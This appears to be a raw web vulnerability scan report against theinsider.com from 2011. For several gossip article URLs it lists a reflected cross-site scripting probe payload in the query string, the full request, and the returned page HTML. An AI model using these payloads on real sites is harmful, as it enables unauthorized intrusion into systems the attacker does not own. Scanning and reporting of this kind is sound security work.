f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/06/74608/heidi_montag_340.jpg' alt='' /><p class='photo_copyright'></p></div><p class='article'><h3>Say What ...?! Heidi Montag the Book Lover?!</h3><p class='publish_date'></p><p class='publish_date'>August 12, 2011</p><p>
Well now I've really heard it all! Prepare yourself pop-culture enthusiasts-- apparently Heidi Montag reads ...&nbsp;books! Say whaaaaaat!? I know, I'm just as shocked as you are.&nbsp; </p><p>
The bottle blonde reality &quot;star&quot; just tweeted, &quot;<em>The Hunger Games</em> is the best book I have read since <em>Harry Potter</em>.&quot; </p><p>
This is the funniest joke I've heard in ages! Heidi Montag -- READING!? Whom you kidding Heidikins!? <em>The Hunger Games</em> is the best book you've read since <em>Harry Potter!? </em>-- I'm thinking more like <em>Clifford the Big Red Dog</em>. Maybe I'm just unfairly judging her based on ... EVERYTHING&nbsp;I'VE&nbsp;EVER HEARD HER SAY, but when I think of Heidi Montag reading, I envision her atop a big white bed, a wild-eyed Spencer at her side, both of them surrounded by good-vibes crystals while confusedly looking at a picture book. </p><p>
And I'm putting&nbsp; this out into the ether -- does it count as &quot;reading&quot; if it's a book on tape? I'm going with no. Anyway, Heidi, you are such a jokester. You slay me! So thanks for the laughs, I&nbsp;needed a few chuckles today. </p><p>
-Meg Swertlow </p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class="article-more-news-box"><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html"><img src="/media/photo/2011/10/93412/halery_112_paramount.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html" class="article-more-news-headline">Hayley Atwell: I Groped Chris Evans For You!</a></h5><d..
- /gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html

/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html

http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html?'%22-..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002626)</script>

Request

GET /gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/39237_Before_They_Were_Famous/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:14 GMT
Content-Length: 13349
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Watch: Snooki Gets Serious with New Boyfriend</title><meta name="description" content="" /><meta name="keywords" content="Jersey Shore, jionni lavalle, news, snooki, snooki boyfriend" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-11 10:16:00" /><meta property="og:title" content="Watch: Snooki Gets Serious with New Boyfriend" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/08/81844/vid_snooki_bf_110811_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Cameras caught up with Jersey Shore star Snooki leaving MTV Studios in New York yesterday, where the pint-sized guidette was filmed holding hands with boyfriend Jionni LaValle." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-11 10:16:00" /> <Attribute name="sdate" value="20110811" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/08/81844/vid_snooki_bf_110811_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_video;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"> <div id='slate_player' class='show_slate' style='z-index: 2;'><object id='flashobject' type='application/x-shockwave-flash' allowScriptAccess='always' allowFullScreen='true' allowNetworking='all' height='272' width='431' data ='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'><param name='quality' value='high' /><param name='allowFullScreen' value='true' /><param name='allowScriptAccess' value='always' /><param name='allowNetworking' value='all' /><param name='movie' value='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'/><param name='flashvars' value='config=http://r.unicornmedia.com/embed/ab2b5d77-6ea3-4720-8249-dccf2b6bac03?view=fkey%26view_id=43326&programID=4dd16b9508b2e' /></object></div><div id='adCompanionBanner'></div> </div><p class='article'><h3>Wedding Bells for Snooki and BF? [video]</h3><p class='publish_date'></p><p class='publish_date'>August 11, 2011</p><p>
Cameras caught up with <em>Jersey Shore</em> star Snooki leaving MTV Studios in New York yesterday, where the <a href="http://oaktree.theinsider.com/screen/43310_Snooki_I_Would_Win_the_Whole_Thing_on_Dancing_with_the_Stars/index.html" target="_blank">pint-sized guidette</a> was filmed holding hands with boyfriend Jionni LaValle.</p><p>
Arguably the <a href="http://cs1.theinsider.com/screen/43084_Snooki_Leaves_Jersey_Shore_Wearing_a_Bunny_Head_video/index.html" target="_blank">breakout star</a> of MTV's <a href="http://www.theinsider.com/news/40583_WATCH_Snooki_and_the_Jersey_Shore_girls_head_for_Italy/index.html" target="_blank">hit show</a>, the 23-year-old revealed just how serious she was about Jionni when she told <em>Good Morning America</em> on Wednesday, &quot;Jionni's a great guy, so you know I'm down to make Guido babies with him!&quot;</p><p>
Though she clarified that she was not ready to get married yet, she certainly didn't have any reservations when it came to putting the pressure on her beau, telling him, &quot;I want a big ring baby!&quot;</p><p>
Check out the video to see the lovebirds in NYC.













</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Perfo..
- /gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html

/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html

http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html?'%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00268C)</script>

Request

GET /gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/39237_Before_They_Were_Famous/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:20 GMT
Content-Length: 13002
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Miranda Cosgrove Escapes 'Life-Threatening' Crash</title><meta name="description" content="" /><meta name="keywords" content="icarly, miranda cosgrove, news celebrity, nickelodeon" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-11 17:43:00" /><meta property="og:title" content="Miranda Cosgrove Escapes 'Life-Threatening' Crash" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/08/81908/miranda_cosgrove_lbusacca_110227_109488001_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Both Miranda Cosgrove and her mother reportedly suffered injuries in a life-threatening crash on Thursday morning." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-11 17:43:00" /> <Attribute name="sdate" value="20110811" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/08/81908/miranda_cosgrove_lbusacca_110227_109488001_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div 